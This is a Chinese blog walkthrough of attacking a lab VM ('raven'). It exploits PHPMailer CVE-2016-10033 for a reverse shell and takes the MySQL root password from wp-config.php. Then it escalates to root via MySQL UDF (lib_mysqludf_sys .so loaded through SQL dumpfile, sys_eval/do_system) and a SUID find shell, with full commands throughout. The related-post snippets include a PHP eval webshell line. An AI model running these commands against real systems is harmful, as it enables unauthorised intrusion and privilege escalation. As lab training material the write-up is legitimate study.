Mysql—udf实战提权

最新推荐文章于 2024-08-20 18:02:14 发布
最新推荐文章于 2024-08-20 18:02:14 发布
阅读量2.6k 收藏 4
点赞数 5
分类专栏: linux提权 文章标签: mysql 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45927819/article/details/123552619
版权

文章目录

环境

raven : 192.168.137.137
kali: 192.168.137.128
在这里插入图片描述

扫描端口

nmap -sS -Pn -A -p- -n 192.1678.137.137

在这里插入图片描述

扫描目录

dirb http://192.168.137.137
关键信息:
存在目录vendor,version下对应的是PHPMailer的版本:5.2.16
在这里插入图片描述

百度搜索:PHPMailer < 5.2.18 远程代码执行漏洞(CVE-2016-10033)

存在远程代码执行漏洞,那就好办了,
在这里插入图片描述
将脚本文件复制,
修改参数:
网站路径是/var/www/html/一定要加

在这里插入图片描述

反弹shell

使用python3运行脚本:
在这里插入图片描述
访问192.168.137.137/contact.php就会生成后门文件shell.php
然后我们开启端口监听:

nv -lvp 4444

访问shell.php,另一边成功反弹shell:
在这里插入图片描述

执行python -c "import pty;pty.spawn('/bin/bash')"获得一个交互式的shell:
在这里插入图片描述
在wp-config.php下找到了数据库的用户名和密码:

root
R@v3nSecurity

在这里插入图片描述
连接数据库:
在这里插入图片描述

linux下udf提权

连接数据库:
1、查看是否有写文件的权限:
在这里插入图片描述
2、查看各个用户的权限:
当前用户启动数据库位root权限:
在这里插入图片描述
3、数据库版本是5.5.60,我们就需要知道plugin所在的位置,将so文件上传
在这里插入图片描述
4、查看数据库和操作系统架构

方式一

show variables like "%compile%"

在这里插入图片描述

64位的mysql数据库,去找对应的payload,可以在msf目录下查找就行,因为是64位的,所以必须要使用lib_mysqludf_sys_64.so

msf目录下的so文件在:usr/share/metasploit-framework/data/exploits/mysql

复制到根目录:
在这里插入图片描述
在kali上开启http服务:python3 -m http.server 8000
靶机通过wget命令下载so文件
在这里插入图片描述

连接mysql

mysql -u root -pR@v3nSecurity

在MySQL中Blob是一个二进制的对象,它是一个可以存储大量数据的容器(如图片,音乐等等),且能容纳不同大小的数据,在MySQL中有四种Blob类型,他们的区别就是可以容纳的信息量不容分别是以下四种:
①TinyBlob类型 最大能容纳255B的数据
②Blob类型 最大能容纳65KB的
③MediumBlob类型 最大能容纳16MB的数据
④LongBlob类型 最大能容纳4GB的数据

use mysql;
create table temp6(data longblob);

insert into temp6(data) values (load_file('/var/www/html/lib_mysqludf_sys_64.so'));   //上传到哪就写哪
select data from temp6 into dumpfile "/usr/lib/mysql/plugin/udf64.so";   //这个和上一行不是一个路径,要根据前面进程列出来的plugin目录进行改动(一般就是这个)
create function sys_eval returns string soname 'udf64.so'; //创建sys_eval函数
select sys_eval('whoami'); //执行函数;

在这里插入图片描述

方式二

use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));   //上传到哪就写哪
select * from foo into dumpfile '/usr/lib/mysql/plugin/1518.so';   //这个和上一行不是一个路径嗷,要根据前面进程列出来的plugin目录进行改动(一般就是这个)
create function do_system returns integer soname '1518.so';     //创建 do_system 函数调用
select do_system('chmod u+s /usr/bin/find');     //给find命令赋予suid权限

exit退出mysql,配合使用 find 调用执行find . -exec /bin/sh ; 成功!!
在这里插入图片描述

参考文章:
https://blog.csdn.net/kukudeshuo/article/details/118888664

Stray.io
关注
专栏目录
linux mysql udf 提权
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
10-30 952
创建自定义函数STRING | INTEGER } SONAME '文件名';[]是可选项[AGGREATE]是聚集函数的表示,系统定义的聚集函数比如有COUNT()、AVE()、MN()、MAX()、SUM(){STRING|INTEGER|REAL} 是返回的类型 字符串,整型SONAME 'file'表示这个函数从哪个文件里面引入,而这个文件一般是动态链接库windows下是dll,linux是so,并且这个文件要在mysql的plugin目录下。
sqlmap mysql udf提权_Mysql提权-基于MysqlUDF提权Linux系统)
weixin_34696006的博客
01-30 785
基于MysqlUDF提权(Linux系统)【实验目的】??通过本实验理解如何通过webshell结合sqlmap自带的dll文件对Linux系统进行UDF提权,熟悉UDF提权的主要方法。【实验环境】攻击机:Kali-pri用户名college,密码360College目标靶机:CentOS-sqli-lab用户名college,密码360College【实验原理】??scp命令简介:??scp是...
linux环境下的MySQL UDF提权
黑战士的博客
04-25 1628
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞提权的时候发现补丁全部被修补。这个时候需要利用第三方应用提权。当MYSQL权限比较高的时候我们就可以利用udf提权。###利用前提mysqlfuncfunc。
Mysql - UDF提权介绍
最新发布
Reset
08-20 386
Mysql 的 User Defined Functions(UDF)功能,允许用户扩展mysql的功能,通过编写自定义的函数,用户可以将复杂的逻辑封装成函数,然后在sql查询中直接使用。所以攻击者可能会尝试通过UDF提权来获取数据库的高级权限,从而执行任意代码或者敏感数据。
mysql linux udf_MySQLUDF
weixin_42604188的博客
01-19 272
MySQL中,通过CREATE FUNCTION命令可以调用不同的.so共享库文件.在编译前需要加上选项:--with-mysqld-ldflags=-rdynamic重新编译的时候出了点小问题,可能是升级系统时丢失了……configure: error: No curses/termcap library found解决方法:sudo apt-get install libncurses5-d...
Linux提权mysql UDF提权
waxcj的博客
12-16 2137
linux mysql数据库提权
udf提权原理研究-udf开发-linshao
qq_35349673的博客
02-20 3970
mysql通常是使用管理员权限进行配置,因此我们获取一个较低权限时可以通过mysql进行权限提升,本文侧重于制作utf扩展
【SQL注入】UDF提权命令执行
孤桜懶契
08-15 4266
一、什么是udf udf 全称为:user defined function,意为用户自定义函数;用户可以添加自定义的新函数到Mysql中,以达到功能的扩充,调用方式与一般系统自带的函数相同,例如 contact(),user(),version()等函数。 udf 文件后缀一般为 dll,由C、C++编写 二、udf在渗透中的作用 在一般渗透过程中,拿下一台windows服务器的webshell时,由于webshell权限较低,有些操作无法进行,而此时本地恰好存在mysql数据库,那么udf可能就派上用场
php提权,一次实战提权
weixin_39996096的博客
03-10 1211
原标题:一次实战提权闲来没事,朋友发给我一个站,需要提权,然后那就试试吧,于是就有了接下来的文章,大牛勿喷https://xxxxxx/……/Abstract.aspx(地址不方便公布)猜测:已经上了一个aspx的大马,看来支持aspx那就可能有mssql环境,可能开放了1433,待会可以利用sa提权等等有关mssql的提权方法: 然后打开访问看看: 熟悉的界面,那我们先来搜集一下基本信息: 从这...
Linux提权—服务漏洞,以MySQL-UDF提权为例,2024年最新2024-2024阿里巴巴网络安全面试真题解析
2301_77118221的博客
04-15 286
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!对于从来没有接触过网络安全的同学,我们帮你准备了详细的。资源较为敏感,未展示全面,需要的最下面获取。,大家跟着这个大的方向学习准没问题。
mysql-udf-http
03-08
mysql-udf-http
Linux利用UDF库实现Mysql提权
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
mysql-udf-http下载
09-02
mysql-udf-http下载 发现很多链接都是链接到谷歌 在这里csdn传一份,方便大家国内下载 谢谢
UDF靶场环境提权实战
蘇同学的安全屋的博客
04-29 2774
UDF靶场环境提权实战 Kali:192.168.221.130 靶机主机:192.168.221.136 1.nmap扫描主机 2.扫描主机的服务:发现有80,135,139,445,1025,3306,3389 3.尝试爆破3306,爆破成功 因开启了远程连接,使用navicat连接成功 4.使用show variables like ‘%priv%’;查询结果为空,可以写入一句话木马 写入一句话木马(需要猜测目录) SELECT “<?php eval($_POST['code']);
linux提权——Mysql UDF提权
qq_55202378的博客
04-12 653
UDF:user define fucntion,在mysql中,允许用户创建自定义函数,这些函数可以在SQL查询语句中使用,通过使用UDF,用户可以对数据库执行自定义操作。:生成位置无关代码,PIC(Position independent code),这种代码可以在内存中的任何位置执行,简单查看该EXP,在利用过程中,需要登陆到mysql数据库,新建表,在表中插入编译好的共享库,gcc编译的时候,不指定相关参数,直接接源文件,可能会有各种各样的报错。:仅仅编译源代码,不进行链接,通常生成.o文件。
MySQLUDF
shaoyiwenet的专栏
11-21 9611
最近用到MySQLUDF, 查了一下相关文献, 对用户用户实现function和Aggregate function的方法做个介绍.
mysql linux udf提权,mysql udf提权原理和提权案例分析 udf提权木马下载
weixin_32538033的博客
05-03 306
本文将详细讲述udf提权的原理及具体方法 您可以使用下面提供的 langouster_udf.dll 专用网马(php)或者使用 php spider shell最新版(已去后门)--非常强大的PHP大马 里面的udf提权功能上传udf.php到目标站点访问 下面是udf提权马的界面进入之后.安装下面是这款udf.php提权马可以安装的function用法和说明一、功能:利用MYSQL的Cre...
星外MySQL提权实战:从权限获取到服务器控制
这篇文章详细介绍了如何在特定环境下利用MySQL权限漏洞进行提权,包括文件下载、环境复现、版本识别以及利用UDF等步骤,对理解MySQL安全提权技术有很好的参考价值。同时,它提醒读者,即使面临一些限制,熟练的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值